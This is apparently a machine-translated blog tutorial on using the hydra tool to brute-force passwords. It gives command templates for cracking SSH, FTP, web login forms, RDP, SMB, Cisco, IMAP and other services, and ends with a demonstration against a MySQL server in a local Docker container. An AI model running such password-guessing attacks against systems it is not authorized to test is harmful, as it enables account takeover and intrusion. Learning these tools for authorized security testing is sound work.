Hacker's road - use hydra for simple password blasting

Tools needed:

Kali (or not required)
hydra (Kali comes with it, you can install windows version or other platforms by yourself)
Password dictionary (go to github and find the keyword "dictionary")

This tutorial is only for technical exchange. Please do not use it for other purposes. I am not responsible for any illegal and criminal behavior using this technology!!

1. Brief introduction

1.1. Source and main functions

hydra is an open-source violent password cracking tool of thc, a famous hacker organization. It can crack a variety of passwords online. officer
Network: http://www.thc.org/thc-hydra .

It can support AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY,HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy,ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec,Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP passwords.

1.2 parameter description

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 
 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 
 
-R Continue to crack from the last progress. 
 
-S use SSL Link. 
 
-s PORT You can specify a non default port through this parameter. 
 
-l LOGIN Specify the user to crack and crack the specific user. 
 
-L FILE Specifies the user name dictionary. 
 
-p PASS Lowercase, designated password cracking, less use, generally using password dictionary. 
 
-P FILE Uppercase, specifies the password dictionary. 
 
-e ns Optional options, n: Trial password is empty, s: Use the specified user and password. 
 
-C FILE Use a colon split format, such as login:"Password" instead-L/-P Parameters. 
 
-M FILE Specify the target list file one line at a time. 
 
-o FILE Specifies the result output file. 
 
-f in use-M After parameter, stop cracking when the first pair of login names or passwords are found. 
 
-t TASKS The number of threads running at the same time. The default is 16. 
 
-w TIME Set the maximum timeout time, in seconds. The default is 30 s.  
 
-v / -V Displays the detailed process. 
 
server target ip 
 
service Specify the service name, supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp wait. 
 
OPT Optional

2. Example syntax

2.1. Crack ssh:

hydra -l user name -p Password dictionary -t Number of threads -vV -e ns ip ssh 
hydra -l user name -p Password dictionary -t Number of threads -o save.log -vV ip ssh 

2.2. ftp cracking:

hydra ip ftp -l user name -P Password dictionary -t Number of threads(Default 16) -vV 
hydra ip ftp -l user name -P Password dictionary -e ns -vV 

2.3. Submit in get mode and crack web login:

hydra -l user name -p Password dictionary -t Number of threads -vV -e ns ip http-get /admin/ 
hydra -l user name -p Password dictionary -t Number of threads -vV -e ns -f ip http-get /admin/index.php

2.4. Submit in post mode and crack web login:

hydra -l user name -P Password dictionary -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 

(Parameter Description: - t the number of simultaneous threads is 3, - l the user name is admin, the dictionary pass.txt is saved as out.txt, - f when a password is cracked, it will stop,
10.36.16.18 target ip, http post form indicates that the cracking is the password cracking of the form submitted by http post,

The content in is the return information prompt indicating the wrong guess.)

2.5. Crack https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 

2.6. Crack teamspeak:

hydra -l user name -P Password dictionary -s Port number -vV ip teamspeak 

2.7. Crack cisco:

hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 

2.8. Crack smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb 

2.9. Crack pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3 

2.10. Cracking rdp:

hydra ip rdp -l administrator -P pass.txt -V 

2.11. Crack HTTP proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18 

2.12. Crack imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

3. Practical demonstration

Environmental construction process: Reference: MySQL5.7. Open password login

3.1. Specify user name MySQL

3.1.1 specify user name for blasting

Password dictionary: write multiple passwords (one per line), one of which must be a real password, otherwise the explosion fails

Blasting order

hydra -l root -P pass.txt mysql://172.17.0.2

PS:
-L # specify a user name (- L specify user name dictionary)
-P # specifies a password dictionary file

Then you can see that the password explosion is successful!

Add: if you need to know how long it has been running, you can add a command before the command: time

time hydra -l root -P pass.txt mysql://172.17.0.2

Tags: Docker Cyber Security cryptology kali

Posted by donbonzo on Thu, 12 May 2022 19:44:06 +0300